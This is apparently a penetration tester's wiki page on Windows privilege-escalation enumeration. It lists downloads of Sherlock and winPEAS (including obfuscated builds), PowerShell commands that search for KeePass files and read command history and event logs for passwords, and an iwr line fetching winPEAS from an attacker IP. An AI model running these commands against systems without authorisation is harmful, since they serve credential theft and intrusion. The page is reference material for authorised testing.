Wiki
Powered by

# Windows Enumeration

By
Adrien
Published 2025-11-24

This wiki part is about Manual and Auto recon process that you might use during your pentesting assessments.

# Recon - Auto

# Sherlock

Github Link : https://github.com/rasta-mouse/Sherlock

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 -O sherlock.ps1

# Winpeas

Github Link : https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Default Version

wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx64.exe -O winpeas64.exe
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx86.exe -O winpeas86.exe

Obfuscated Version

wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx64_ofs.exe -O winpeas64op.exe
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx86_ofs.exe -O winpeas86op.exe

# Recon - Manual

You don't need a tool for this part, just an access to a PowerShell commandline.

# Local Enumeration Commands

Make sure to use a powershell interpreter.

whoami /priv
whoami /groups

Check Local users & groups

Get-LocalUser
Get-LocalGroup

Check users inside a local group

Get-LocalGroupMember <group-name>

Check system informations

systeminfo
ipconfig /all
route print
netstat -ano

# Installed applications

For more information you can remove the select part.

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# Processes 

Get-Process
Get-Process | Select-Object Name, Id, Path

# File research 

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Focused with XAMPP You Can change the APP to other folders

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Focused with User Desktop

Get-ChildItem -Path C:\Users\<NAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.settings -File -Recurse -ErrorAction SilentlyContinue

# Looking for Secrets in Powershell 

Get-History
(Get-PSReadlineOption).HistorySavePath

Event Viewer scripts or hidden passwords

Get-WinEvent -FilterHashtable @{logname = "Microsoft-Windows-PowerShell/Operational"; id = 4104 } | Select-Object -ExpandProperty Message

# Run As

It's going to run the command as another user.

runas /user:<NAME> cmd

# Download remote file 

iwr -uri http://192.168.1.35/winPEASx64.exe -Outfile winPEAS.exe

© Copyright 2025. All rights reserved.